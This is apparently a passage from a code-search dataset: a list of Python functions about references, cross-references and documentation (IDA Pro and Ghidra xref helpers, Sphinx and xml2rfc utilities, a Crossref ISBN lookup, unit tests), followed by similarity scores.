the pointers should be retrieved instead\r\n size_pool = self.getSize(withPool=True)\r\n # for each instruction\r\n for i in idautils.FuncItems(self.func_ea):\r\n for xref in idautils.XrefsFrom(i, 0):\r\n # if the xref is to a far or near called function\r\n if xref.type == idc.fl_CN or xref.type == idc.fl_CF:\r\n if xref.to not in crefs:\r\n crefs.append(xref.to)\r\n # if the xref is to a read or write data access\r\n if xref.type == idc.dr_W or xref.type == idc.dr_R:\r\n if xref.to not in drefs:\r\n # if xref.to is in the pool, then retrieve content if it's a pointer\r\n if xref.to < self.func_ea + size_pool:\r\n # those are the references found at the pool location\r\n iteratedOnce = False\r\n for poolRef in idautils.XrefsFrom(xref.to, 0):\r\n if iteratedOnce:\r\n raise(FunctionException(\"%08X: there should only be one data xref in pool variable\"\r\n % (self.func_ea)))\r\n # there should only be one in the pool refernce\r\n if poolRef.to not in drefs:\r\n drefs.append(poolRef.to)\r\n iteratedOnce = True\r\n else:\r\n drefs.append(xref.to)\r\n\r\n # for ref in idautils.DataRefsFrom(self.func_ea):\r\n # drefs.append(ref)\r\n # for ref in idautils.DataRefsFrom(self.func_ea - 1):\r\n # drefs.append(ref)\r\n return crefs, drefs", "def References(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('references', default)\n return [HEP.ReferenceObject(i) for i in tmp]", "def refs_ii(self):\n return self._refs_ii", "def test_xref(self):\n with sphinx_build('pyexample'):\n with open('_build/text/docfx_yaml/example.nap.Base.yml') as yml_file:\n data = yaml.safe_load(yml_file)\n for item in data['items']:\n if item['uid'] == 'example.nap.Base.ref':\n self.assertEqual(\n item['seealsoContent'],\n 'Depends on @example.example.Foo Relative reference on @example.nap.Base.foo'\n )", "def get_refs(*args, **kwargs):\n return get_refs_async(*args, **kwargs).get_result()", "def get_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def get_docs(self):\n return self.retrieve_docstring()", "def get_docs(self):\n return self.retrieve_docstring()", "def get_docs(self):\n return self.retrieve_docstring()", "def genReferences( self, aWeb ):\n try:\n for t in self.commands:\n ref= t.ref( aWeb )\n if ref is not None:\n yield ref\n except Error as e:\n raise", "def getReferencesTo(self, address: ghidra.program.model.address.Address) -> List[ghidra.program.model.symbol.Reference]:\n ...", "def getReferenceAnalyses(self):\n return [analysis for analysis in self.getAnalyses() \\\n if analysis.portal_type=='ReferenceAnalysis']", "def get_dependencies(self, recursive=False):\n dependencies = set()\n for reference in self.references:\n if isinstance(reference.ref_cell, Cell):\n if recursive:\n dependencies.update(reference.ref_cell.get_dependencies(True))\n dependencies.add(reference.ref_cell)\n return dependencies", "def references(self):\n return self.header('References', '').split()", "def dependencies(self, dep_context):\n if self.strict_deps:\n return self.target.strict_dependencies(dep_context)\n else:\n return list(self.target.closure(bfs=True, **dep_context.target_closure_kwargs))", "def get_drefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_dref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_dref_from( ea, xrf )\r\n\twhile xrf != 
BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_dref_from( ea, xrf )\r\n\treturn ret", "def get_drefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_dref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_dref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_dref_to( ea, xrf )\r\n\treturn ret", "def get_refs(genome_build, aligner, config):\n find_fn = _find_file(config[CONFIG_KEY], startswith=True)\n ref_prefix = sret.find_ref_prefix(genome_build, find_fn)\n return sret.standard_genome_refs(genome_build, aligner, ref_prefix, _list(config[CONFIG_KEY]))", "def ExtractOperations(toolF):\n return [o[\"uri\"] for o in toolF[\"operation\"]]", "def getRefs(self):\n\n backend = self.backend\n refs = self.moduleRefs\n for ref in refs:\n refPure = ref.rsplit(\":\", 1)[0]\n if refPure in self.seen:\n continue\n\n parts = splitModRef(ref)\n if not parts:\n self.good = False\n continue\n\n parts[2] = prefixSlash(normpath(parts[2])) # the relative bit\n theBackend = (\n None if parts[-1] is None or parts[-1] == backend else parts[-1]\n )\n\n if not self.getModule(*parts[0:-1], backend=theBackend):\n self.good = False", "def docs():", "def ref(request):\n r = referencepytest.ref(request)\n this_dir = os.path.abspath(os.path.dirname(__file__))\n r.set_data_location(os.path.join(this_dir, '..', 'reference'))\n return r", "def reference_types(self):\n return self.references.keys()", "def reference_types(self):\n return self.references.keys()", "def references(self):\n return tuple(self.__references)", "def list_ref_keys(self):\n print('=======')\n print('REFs')\n print('=======')\n for key in self.refs:\n print(key)", "def get_handle_referents(self):\n return self.get_citation_child_list()", "def test_references() -> None:\n soup = generate_case(\"references\")\n\n tests.html_schema_doc_asserts.assert_property_names(\n soup,\n [\n \"a_gift\",\n \"file_prefix\",\n \"anchor_with_slash\",\n \"propertyA\",\n \"anchor_no_slash\",\n \"anchor_nested_reference\",\n \"same_file_anchor_with_slash\",\n \"same_file_anchor_no_slash\",\n \"same_file_nested_reference\",\n \"other_file_anchor\",\n \"with_wrap\",\n \"other_file_dot_anchor\",\n \"other_file_dot_dot_anchor\",\n \"other_file_only\",\n \"not_a_string\",\n \"multi_hierarchy_reference\",\n \"propertyA\",\n ],\n )\n tests.html_schema_doc_asserts.assert_descriptions(\n soup,\n [\n \"Testing $ref\",\n \"A gift, or is it?\",\n \"A gift, or is it?\",\n \"Description for object_def/items/propertyA\",\n \"Description for array_def\",\n \"Description for string_def\",\n \"The delivery is a gift, no prices displayed\",\n \"The delivery is a gift, no prices displayed\",\n \"The delivery is a gift, no prices displayed\",\n \"Test schema with a not\",\n \"Contents of propertyA in final.json\",\n ],\n )\n tests.html_schema_doc_asserts.assert_types(\n soup,\n [\n \"object\", # root\n \"string\", # a_gift\n \"string\", # file_prefix\n \"object\", # anchor_with_slash\n \"string\", # anchor_with_slash -> propertyA\n \"array of string\", # anchor_no_slash\n \"string\", # anchor_no_slash items\n \"string\", # anchor_nested_reference\n \"string\", # same_file_anchor_with_slash\n \"object\", # same_file_anchor_no_slash\n \"string\", # same_file_nested_reference\n \"object\", # other_file_anchor\n \"boolean\", # other_file_anchor -> with_wrap\n \"object\", # other_file_dot_anchor\n \"object\", # other_file_dot_dot_anchor\n \"object\", # other_file_only\n \"string\", # not_a_string, not\n \"object\", # 
multi_hierarchy_reference\n \"string\", # multi_hierarchy_reference -> propertyA\n ],\n )", "def get_crossrefs(self):\n inter = self.get_interaction()\n crossrefs = {inter: inter.get_crossrefs()}\n crossrefs.update(self._economics.get_crossrefs())\n return crossrefs", "def __doc__(self):\n return self.fget.__doc__", "def get_fsleyes_deps():\n\n # The dependency list is stored in requirements.txt\n with open(op.join(basedir, 'requirements.txt'), 'rt') as f:\n install_requires = f.readlines()\n\n return [i.strip() for i in install_requires]", "def get_supported_dofs(self) -> list[int]:\n\n return flatten([node.get_restrained_dofs() for node in self.nodes])", "def test_v1_alert_ref_list_get(self):\n pass", "def get_refnodes(\n self, doctree: Node, result: list[dict[str, Any]],\n ) -> list[dict[str, Any]]:\n # XXX: is there a better way than checking the attribute\n # toctree-l[1-8] on the parent node?\n if isinstance(doctree, nodes.reference) and doctree.get('refuri'):\n refuri = doctree['refuri']\n if refuri.startswith(('http://', 'https://', 'irc:', 'mailto:')):\n return result\n classes = doctree.parent.attributes['classes']\n for level in range(8, 0, -1): # or range(1, 8)?\n if (self.toctree_template % level) in classes:\n result.append({\n 'level': level,\n 'refuri': html.escape(refuri),\n 'text': ssp(html.escape(doctree.astext())),\n })\n break\n elif isinstance(doctree, nodes.Element):\n for elem in doctree:\n result = self.get_refnodes(elem, result)\n return result", "def readlink_ops(self):\n return self._readlink_ops", "def getListOfReferenceGlyphs(self, *args):\n return _libsbml.GeneralGlyph_getListOfReferenceGlyphs(self, *args)", "def _expand_ref(self, element): \n if element.tag == 'xref':\n target = element.attrib.get('target', '')\n format = element.attrib.get('format', self.defaults['xref_format'])\n item = self._getItemByAnchor(target)\n if not self.indexmode:\n if not item:\n xml2rfc.log.warn(\"Can't resolve xref target %s\" % target)\n else:\n item.used = True\n # Create xref from index lookup\n if not item:\n text = '[' + target + ']'\n elif format == 'none':\n text = ''\n elif format == 'counter':\n text = item.counter\n elif format == 'title':\n text = item.title.strip() if item.title else ''\n else:\n # Default\n text = item.autoName\n\n # following the V3 HTML -\n # If you specify text, that is what you get.\n if element.text:\n text = element.text.rstrip()\n \n a = E.A(href='#' + target)\n a.attrib[\"class\"] = \"xref\"\n a.text = text\n if element.tail:\n a.tail = element.tail\n \n return [a]\n\n elif element.tag == 'eref':\n target = element.attrib.get('target', '')\n if element.text:\n a = E.A(element.text, href=target)\n a.tail = element.tail\n return [a]\n else:\n sp1 = E.SPAN('<')\n a = E.A(target, href=target)\n sp2 = E.SPAN('>')\n sp2.tail = element.tail\n return [sp1, a, sp2]\n elif element.tag == 'cref':\n self.cref_counter += 1\n anchor = element.attrib.get('anchor', None)\n if anchor is None:\n anchor = 'CREF' + str(self.cref_counter)\n a = E.A('[' + anchor + ']', id=anchor)\n a.attrib['class'] = 'info'\n source = element.attrib.get('source', '')\n if source:\n source = source + \": \"\n b = E.SPAN(source + element.text)\n b.attrib['class'] = 'info'\n a.append( b )\n self._indexCref(self.cref_counter, anchor)\n if element.tail:\n a.tail = element.tail\n return [a]\n elif element.tag == 'iref':\n return self._add_iref_to_index(element)\n elif element.tag == 'spanx':\n style = element.attrib.get('style', self.defaults['spanx_style'])\n text = ''\n if 
element.text:\n text = element.text\n elem = None\n if style == 'strong':\n elem = E.STRONG(text)\n elif style == 'verb':\n elem = E.SAMP(text)\n else:\n # Default to style=emph\n elem = E.EM(text)\n if element.tail:\n elem.tail = element.tail\n return [elem]", "def references(self):\n return self._get_related_resources(False)", "def links(self):\n inp, out = self.signature\n if self.is_function():\n using = self.function.function\n if not all(inp) or not out:\n return []\n link = core.component_link.ComponentLink(inp, out, using)\n return [link]\n if self.is_helper():\n helper = self.function.helper\n if not all(inp):\n return []\n return helper(*inp)", "def test_getCpfRelationLinks(self):\n cases = [\n (self.test_eac + \"NE00601.xml\", 3),\n (self.test_eac + \"NE00100.xml\", 6),\n (self.test_eac + \"NE00201.xml\", 6),\n ]\n for case in cases:\n source, expected = case\n doc = EacCpf.EacCpf(source, 'http://www.example.com')\n self.assertNotEqual(None, doc)\n result = doc.getCpfRelationLinks()\n self.assertNotEqual(None, result)\n self.assertEqual(expected, len(result))", "def get_dependencies(self, recursive=False):\n dependencies = set()\n for element in self.elements:\n if isinstance(element, CellReference) or isinstance(\n element, CellArray):\n if recursive:\n dependencies.update(\n element.ref_cell.get_dependencies(True))\n dependencies.add(element.ref_cell)\n return dependencies", "def get_explorer_toolbox() -> List[Tuple[str, str, str]]:\n explorer_toolbox = list(_explorer_toolbox)\n explorer_toolbox.extend(\n (func_name, title, description)\n for func_name, title, description in _bio2bel_functions\n if _function_is_registered(func_name)\n )\n return explorer_toolbox", "def help_links():\n return [\n {\"text\": \"Python Reference\", \"url\": PY_DOCS},\n {\"text\": \"IPython Reference\", \"url\": IPYTHON_DOCS},\n {\n \"text\": \"Robot Framework: User Guide\",\n \"url\": ujoin(ROBOT_DOCS, \"RobotFrameworkUserGuide.html\"),\n },\n *[\n {\n \"text\": f\"{lib} — Robot Framework\",\n \"url\": ujoin(ROBOT_DOCS, \"libraries\", f\"{lib}.html\"),\n }\n for lib in sorted(STDLIBS)\n if lib not in HAS_NO_DOC\n ],\n ]", "def make_crossref_fundref(dataset: ObservatoryDataset) -> List[Dict]:\n\n records = []\n\n for funder in dataset.funders:\n records.append(\n {\n \"pre_label\": funder.name,\n \"funder\": f\"http://dx.doi.org/{funder.doi}\",\n \"country_code\": funder.country_code,\n \"region\": funder.region,\n \"funding_body_type\": funder.funding_body_type,\n \"funding_body_sub_type\": funder.funding_body_subtype,\n }\n )\n\n return records", "def DataRefsFrom(ea):\n xref = ida_xref.xrefblk_t()\n yield from xref.drefs_from(ea)", "def get_link_fields(doctype):\n\timport webnotes.model.doctype\n\tdoclist = webnotes.model.doctype.get(doctype)\n\treturn [\n\t\t(d.fields.get('fieldname'), d.fields.get('options'), d.fields.get('label'))\n\t\tfor d in doclist\n\t\tif d.fields.get('doctype') == 'DocField' and d.fields.get('parent') == doctype\n\t\tand d.fields.get('fieldname')!='owner'\n\t\tand (d.fields.get('fieldtype') == 'Link' or\n\t\t\t(\td.fields.get('fieldtype') == 'Select'\n\t\t\t\tand (d.fields.get('options') or '').startswith('link:'))\n\t\t\t)\n\t]", "def get_referenced_handles(self):\n return (self.get_referenced_note_handles() +\n self.get_referenced_tag_handles())", "def listCmdDoc(self):\n attr = self.__listAttr()\n filter = []\n for name in attr:\n if name[:1] == '_': pass\n elif name[-6:] == '_usage': pass\n else: filter.append(name)\n return filter", "def getDocsList(self):\n return 
self.docs_list", "def list_ref0s(self):\n print('-----\\nREF0s\\n-----')\n self._print_dict(self.ref0s)", "def RawRefs(self, default=[{}]):\n tmp = self.data.get('raw_refs', default)\n return [HEP.RawReferenceObject(i) for i in tmp]", "def get_references(caller, callee):\n function_manager = currentProgram.getFunctionManager()\n\n ref_list = []\n callee_symbol = callee.getSymbol()\n callee_references = callee_symbol.getReferences()\n\n for ref in callee_references:\n addr = ref.getFromAddress()\n func = function_manager.getFunctionContaining(addr)\n if func == caller:\n ref_list.append(addr)\n\n return ref_list", "def ref(self):\n\t\treturn self.bottle.ref", "def create_included_function_list_readme():\n import iteration_utilities\n from iteration_utilities import Iterable\n from itertools import chain\n from operator import itemgetter\n from astropy.table import Table\n from astropy.io.ascii import RST\n\n rtd_link = '`{name} <http://iteration-utilities.readthedocs.io/en/latest/api/{file}.html#{module}.{name}>`_'\n\n module_to_file = {'iteration_utilities': 'cfuncs',\n 'iteration_utilities._cfuncs': 'cfuncs',\n 'iteration_utilities._helpers._performance': 'helper',\n 'iteration_utilities._recipes._additional': 'additional',\n 'iteration_utilities._recipes._core': 'core',\n }\n\n it = Iterable(chain(iteration_utilities._cfuncs.__dict__.items(),\n iteration_utilities._helpers._performance.__dict__.items(),\n iteration_utilities._recipes._core.__dict__.items(),\n iteration_utilities._recipes._additional.__dict__.items())\n # Exclude PY2 variable and private functions\n ).filterfalse(lambda x: x[0].startswith(('PY2', '_'))\n # Exclude everything that has no __module__\n ).filter(lambda x: hasattr(x[1], '__module__')\n # Only include functions that come from the package\n ).filter(lambda x: x[1].__module__.startswith('iteration_utilities')\n # Remove duplicate names\n ).unique_everseen(itemgetter(0)\n # Sort lexically\n ).get_sorted(key=lambda x: x[0].lower())\n\n it = Iterable(it\n # Create a Sphinx link from function name and module\n ).map(lambda i: rtd_link.format(file = module_to_file[i[1].__module__],\n module = i[1].__module__,\n name = i[0])\n # Group into 4s so we get a 4 column Table\n ).grouper(4, fillvalue=''\n # Convert to list because Table expects it.\n ).as_list()\n\n return '\\n'.join(RST().write(Table(rows=it)))", "def getdoc(doctype, name, user=None):\n\n\timport webnotes\n\t\n\tif not (doctype and name):\n\t\traise Exception, 'doctype and name required!'\n\t\n\tif not name: \n\t\tname = doctype\n\n\tif not webnotes.conn.exists(doctype, name):\n\t\treturn []\n\n\ttry:\n\t\tbean = webnotes.bean(doctype, name)\n\t\tbean.run_method(\"onload\")\n\n\t\tdoclist = bean.doclist\n\n\t\t# add file list\n\t\tset_docinfo(doctype, name)\n\t\t\n\texcept Exception, e:\n\t\twebnotes.errprint(webnotes.utils.getTraceback())\n\t\twebnotes.msgprint('Did not load.')\n\t\traise e\n\n\tif bean and not name.startswith('_'):\n\t\twebnotes.user.update_recent(doctype, name)\n\t\n\twebnotes.response['docs'] = doclist", "def __get_references(self):\n named_references = []\n for usage in self.xml_cache.get_xml_tree(\"usagemodel\"):\n variable_usages = usage.findall(\".//namedReference__VariableUsage\")\n for name in variable_usages:\n named_references.append(name.get(\"referenceName\"))\n return named_references", "def find_book_dois_in_crossref(isbn_list):\n ret_value = {\n \"success\": False,\n \"dois\": []\n }\n if type(isbn_list) != type([]) or len(isbn_list) == 0:\n ret_value['error_msg'] = 
\"Parameter must be a non-empty list!\"\n return ret_value\n filter_list = [\"isbn:\" + isbn.strip() for isbn in isbn_list]\n filters = \",\".join(filter_list)\n api_url = \"https://api.crossref.org/works?filter=\"\n url = api_url + filters + \"&rows=500\"\n request = Request(url)\n request.add_header(\"User-Agent\", USER_AGENT)\n try:\n ret = urlopen(request)\n content = ret.read()\n data = json.loads(content)\n if data[\"message\"][\"total-results\"] == 0:\n ret_value[\"success\"] = True\n else:\n for item in data[\"message\"][\"items\"]:\n if item[\"type\"] in [\"monograph\", \"book\"] and item[\"DOI\"] not in ret_value[\"dois\"]:\n ret_value[\"dois\"].append(item[\"DOI\"])\n if len(ret_value[\"dois\"]) == 0:\n msg = \"No monograph/book DOI type found in Crossref ISBN search result ({})!\"\n raise ValueError(msg.format(url))\n else:\n ret_value[\"success\"] = True\n except HTTPError as httpe:\n ret_value['error_msg'] = \"HTTPError: {} - {}\".format(httpe.code, httpe.reason)\n except URLError as urle:\n ret_value['error_msg'] = \"URLError: {}\".format(urle.reason)\n except ValueError as ve:\n ret_value['error_msg'] = str(ve)\n return ret_value", "def get_docs_urls(self):\n docs_urls = []\n link_labels = []\n for tag in self.post_div.find_all(\"a\"):\n url = tag[\"href\"]\n if url.startswith(\"https://docs.google.com\") or \\\n url.startswith(\"https://drive.google.com\"):\n docs_urls += [url]\n link_labels += [tag.text]\n return docs_urls, link_labels", "def reference_only(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"reference_only\")", "def reference_names(self):\n return [name for name in self.selector.reference_names() if not is_special_value(name)]", "def check_references(swagger: Dict):\n events = set()\n\n ref_jspath = JSPATH_REFERENCES\n\n for _, reference, path in get_elements(swagger, ref_jspath):\n # handle only local references\n if reference.startswith(\"#/\"):\n # decompose reference (error if not possible)\n try:\n rt, obj = reference[2:].split(\"/\")\n except ValueError:\n events.add(\n ReferenceInvalidSyntax(\n path=path, reason=f\"reference {reference} not of the form '#/section/item'\"\n )\n )\n continue\n\n if rt not in REFERENCE_SECTIONS:\n events.add(\n ReferenceInvalidSection(\n path=path,\n reason=f\"Reference {reference} not referring to one of the sections {REFERENCE_SECTIONS}\",\n )\n )\n\n # resolve reference (error if not possible)\n try:\n swagger[rt][obj]\n except KeyError:\n events.add(\n ReferenceNotFoundValidationError(\n path=path, reason=f\"reference '#/{rt}/{obj}' does not exist\"\n )\n )\n\n return events", "def DataRefsTo(ea):\n xref = ida_xref.xrefblk_t()\n yield from xref.drefs_to(ea)", "def get_noncall_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tif ua_mnem( xrf ) != \"call\":\r\n\t\t\tret.append( xrf )\r\n\telse:\r\n\t\tif ea not in get_far_crefs_from( xrf ):\r\n\t\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tif ua_mnem( xrf ) != \"call\":\r\n\t\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def fetch_citylink_refs(self):\n tree = html.fromstring(self.fetch_manifest())\n self_refs = tree.xpath('//table/tr/td/table/tr[position()>4]/td[1]/text()')\n return [x.strip() for x in self_refs[:-1]]", "def references(self) -> Collection[Access]:\n # we don't want to publicly expose the mutable version of this\n return self.__accesses", "def test_getFunctions(self):\n cases = [\n (self.test_eac + 
\"NE01100.xml\", 4),\n (self.test_eac + \"NE01101.xml\", 8),\n (self.test_eac + \"NE01501.xml\", 0),\n (self.test_eac + \"NE00001.xml\", 0),\n ]\n for case in cases:\n source, expected = case\n doc = EacCpf.EacCpf(source, 'http://www.example.com')\n self.assertNotEqual(doc, None)\n result = doc.getFunctions()\n self.assertNotEqual(result, None)\n self.assertEqual(len(result), expected)", "def get_far_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_fcref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_fcref_from( ea, xrf )\r\n\treturn ret", "def getRefs( self, par, path ):\n\n return self.db.getRefsPar( par, path )" ]
[ "0.6066506", "0.59986335", "0.581545", "0.57736564", "0.5760365", "0.573005", "0.5729725", "0.5693465", "0.5646567", "0.5640934", "0.56323737", "0.55529517", "0.5526186", "0.5518354", "0.55112725", "0.5438071", "0.5417537", "0.5400339", "0.53872216", "0.5386622", "0.53764004", "0.53672266", "0.5356825", "0.535014", "0.5306735", "0.53040814", "0.52634984", "0.5250621", "0.52471584", "0.52383137", "0.52376306", "0.5206087", "0.5199984", "0.5181189", "0.5155229", "0.5154959", "0.51541317", "0.5148369", "0.51451814", "0.5138968", "0.5138968", "0.5138968", "0.5135862", "0.5135502", "0.512947", "0.5104735", "0.5083737", "0.50767034", "0.5071842", "0.50697035", "0.5068137", "0.50661653", "0.5055266", "0.5025612", "0.5006902", "0.49996835", "0.49996835", "0.49785003", "0.49769932", "0.49679095", "0.49543378", "0.49430078", "0.4941936", "0.4923499", "0.49231726", "0.49050808", "0.4901296", "0.48939297", "0.48910567", "0.48703313", "0.486843", "0.485347", "0.48524615", "0.48481315", "0.4841523", "0.48358947", "0.4831182", "0.48301643", "0.48273525", "0.48194185", "0.48164496", "0.47995007", "0.47949484", "0.47943273", "0.47936204", "0.4789749", "0.4785538", "0.47848514", "0.47786275", "0.4774898", "0.47648704", "0.47612995", "0.47608975", "0.47577333", "0.47537994", "0.47419968", "0.47391734", "0.4733693", "0.47315982", "0.47267094", "0.47191092" ]
0.0
-1
Returns the amount of global exchange to include.
def get_hyb_exx_coef(self):
    if self._family not in [flags.XC_FAMILY_HYB_LDA, flags.XC_FAMILY_HYB_GGA, flags.XC_FAMILY_HYB_MGGA]:
        raise ValueError("get_hyb_exx_coef can only be called on hybrid functionals.")

    if self._have_cam:
        raise ValueError("get_hyb_exx_coef cannot be called on range-separated functionals.")

    return self._cam_alpha
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_total_instruments(self):\n\n total = 0\n for exchange in self.exchanges:\n total += len(exchange.symbols)\n return total", "def CountGlobal():\r\n return _hiew.HiewGate_Names_CountGlobal()", "def getGlobalSize(self):\n return self._get_global_size( )", "def GOAL_TOTAL() -> int:\n return 21", "def import_grid(self):\n return max(0, self.current_energy_consumed - self.current_energy_produced)", "def _numQueuedTotal(self):\n queueSize = len(self.__queue) + len(self.__clientQueue)\n return queueSize", "def total_additional_charges(self) -> int:\n total = 0\n additional_charges = self.additional_charges\n if additional_charges:\n for charge in additional_charges:\n total += charge['amount']\n return total", "def get_total_supply() -> int:\n return total_supply", "def GlobalSize(self):\n return _hypre.HypreParVector_GlobalSize(self)", "def global_symbols_size(self):\n size = 0\n for s in self.global_symbols:\n if self.global_symbols[s].type == 'procedure': continue\n size += self.global_symbols[s].size\n return size", "def ship_count(self):\r\n return sum(f.ship_count for f in self)", "def total_energy(self):\n return self._total_energy", "def _handle_icx_get_total_supply(self,\n context: 'IconScoreContext',\n params: dict) -> int:\n return self._icx_engine.get_total_supply(context)", "def total_market_value(self):\n return self.pos_handler.total_market_value()", "def _grand_total(self):\n count = 0\n for product in self.products:\n count += product.price\n return count", "def amount_raised_online(self):\r\n return self.stats.amount_raised_online", "def COUNTER_TOTAL():\n return 3", "def get_exchange_reward_per_euro(model):\n exchanged_euros = get_exchanged_euros(model)\n total_euros = get_total_euros(model) \n total_teos = get_total_teos(model)\n exchange_pool = (total_euros - total_teos)*model.buffer_share*model.exchange_reward_share\n if exchanged_euros == 0 or exchange_pool <= 0:\n return 0\n exchange_reward_per_euro = exchange_pool / exchanged_euros \n return round(float(exchange_reward_per_euro),4)", "def siterequestbytesrate(self) :\n\t\ttry :\n\t\t\treturn self._siterequestbytesrate\n\t\texcept Exception as e:\n\t\t\traise e", "def get_amount(self): \n return len(self.get_cards())", "def customAmount(self, guildId):\n return len(self.custom[str(guildId)])", "def base_exchange_rate(self):\n return self._base_exchange_rate", "async def get_garages_total(self):\r\n async with self._db.acquire() as conn:\r\n s = await (await conn.execute(Garage.count())).scalar()\r\n return s", "def comptotalrequests(self) :\n\t\ttry :\n\t\t\treturn self._comptotalrequests\n\t\texcept Exception as e:\n\t\t\traise e", "def available(self):\n return self.stock_level - self.in_order_book", "def get_total_count(self):\n return self.total_count", "def get_fuel_total_saved (self):\n return self.electric_diesel_reduction + self.reduction_diesel_used", "def amount(self):\n return(self.order_master.amount)", "def number_transfers(self, quota):\n if self.elected:\n return len(self.first_votes) - quota\n else:\n return 0", "def total(self):\n\t\treturn self._total", "def getTotalShips(session):\n html = session.get()\n return int(re.search(r'maxTransporters\">(\\d+)<', html).group(1))", "def get_inbound_statements_grid_total_amount_internal(self):\n return self.get_specific_column_value_from_grid(self.inbound_statement_grid_div_id, self.inbound_statements_grid_row_count, self.inbound_statements_grid_total_amount_internal_column_name)", "def get_num_gratings(self):\r\n msg = struct.pack('>2B', 56, 13)\r\n 
response = self.query(msg)\r\n return response[1]", "def outstanding(self):\n return sum(\n transfer.lock.amount\n for transfer in self.locked.values()\n )", "def _get_total_games(self) -> int:\n files = get_tfr_filenames(self.config)\n total_games = 0\n for file in files:\n total_games += int(str(file).split('-')[1].split('.')[0])\n return total_games", "def target_totalfiles(self):\n return self._cfg.get('totalfiles', None)", "def online_quota(self):\r\n return self.max_contributions - self.num_tickets_total", "def module_count(self):\n return self._module_count", "def totalEffectiveLoad(self):\n return sum(s.effectiveLoad() for s in self.dispatcher.statuses)", "def usedspace(self):\n self.log.info(\"freespace\")\n nbytes = 0\n keys = list(self.downloads.keys())\n keys.sort()\n for key in keys:\n download = self.downloads[key]\n nbytes += download['size']\n self.log.info(\"returning:\" + str(nbytes))\n return nbytes", "def fs_hybrid_cache_size_total(self):\n return self._fs_hybrid_cache_size_total", "def get_totals(self):\n return self._get('app_totals')", "def stats(self):\r\n\t\tdata = self._get('global/', query=None)\r\n\t\treturn data", "def _get_echo_req_sent_count(self):\n return self.__echo_req_sent_count", "def total_pulls(self) -> int:\n return self.__total_pulls", "def get_total_energy_produced (self):\n return self.net_generation_wind", "def get_total_distributed(self) -> int:\n return self._total_distributed.get()", "def getAmount(self):\n return self.base.get(\"amount\", [])", "def get_inbound_statements_grid_amount(self):\n return self.get_specific_column_value_from_grid(self.inbound_statement_grid_div_id, self.inbound_statements_grid_row_count, self.inbound_statements_grid_amount_column_name)", "def get_num_gear(self):\n return self.__num_gear_collected", "def fs_files_total(self):\n return self._fs_files_total", "def total_storage(self):\n return self._total_storage", "def xp_share(self):\n pilots = 0\n xp = 0\n for s in self.session_set.all():\n pilots = pilots + s.pilots.count()\n xp = xp + s.xp_total\n return floor(xp/pilots)", "def transfered_amount(self):\n return self.our_state.transfer_amount", "def ReceiveIncomingDelivery(self):\r\n quantityReceived = self.incomingDeliveriesQueue.PopEnvelope()\r\n \r\n if quantityReceived > 0:\r\n self.currentStock += quantityReceived\r\n \r\n return quantityReceived", "def cal_globalIndexH(self):\n h_local = self.cal_localIndexH()\n h_global = np.sum(h_local)\n\n return h_global", "def num_global_external_references(self):\n if self.global_external_references:\n return len(self.global_external_references)\n else:\n return 0", "def fs_total_reserved_space(self):\n return self._fs_total_reserved_space", "def get_total_haberes(self):\n return float(self.input.get_text(liquidaciones_historicas_catalog.TOTAL_HABERES).replace(\".\", \"\"))", "def total_raised(self):\n return self.total_donated() + (self.community_contribution or 0)", "def grand_total(self):\n return sum(self.grid[pos][1] for pos in assignable_positions if self.grid[pos][0]) + self.grid[\"nb\"][1]", "def total(self) -> int:\n return self._total", "def amount_raised_by_tickets(self):\r\n return self.stats.amount_raised_by_tickets", "def total_purchase(self):\n\n total_amount = 0\n #grab all the item\n items = self.item_set.all()\n for item in items:\n total_amount += item.price\n return total_amount", "def total_files_to_process(self) -> float:\n return pulumi.get(self, \"total_files_to_process\")", "def get_usage(self, source):\n return sum(i.quantity for i in 
self.items.all() if i.source == source)", "def get_total_energy_produced (self):\n return self.pre_intertie_generation[:self.actual_project_life]", "def _get_echo_req_received_count(self):\n return self.__echo_req_received_count", "def unmerged_total(self):\n return int(self.git.rev_list('--count', '{}..{}'.format(self.base_branch, self.topic_branch)))", "def total(self):\n if self.dynamic:\n self._update_db_obj()\n return self._db_obj.total", "def GetGlobalNumRows(self):\n return _hypre.HypreParMatrix_GetGlobalNumRows(self)", "def total_clearance(self):\n total_clearances = 0\n debit = 0 #variable to track the remaining debit\n clearances = self.clearance_set.all() #grab all the previous clerances\n for clearance in clearances:\n total_clearances += clearance.paid_value\n return total_clearances", "def bytes_total(self):\n return int(self.status[\"pgmap\"][\"bytes_total\"])", "def energyplus_its(self):\n if self._energyplus_its is None:\n self._energyplus_its = 0\n return self._energyplus_its", "def number_of_open_sites(self):\n return sum(sum(line) for line in self._grid)", "def _qty_precision(self) -> int:\n return selectors.get_exchange(self.exchange).vars['precisions'][self.symbol]['qty_precision']", "def charge(self):\n return sum(self.charges)", "def current_used(self):\n praises = self.caller.get_current_praises_and_condemns()\n return sum(ob.number_used for ob in praises)", "def get_total_redeem(self):\n total = 0\n for redeem in self.get_redeems():\n total += redeem.get_total()\n return total", "def basket_total_incl_tax(self):\n return self.total_incl_tax - 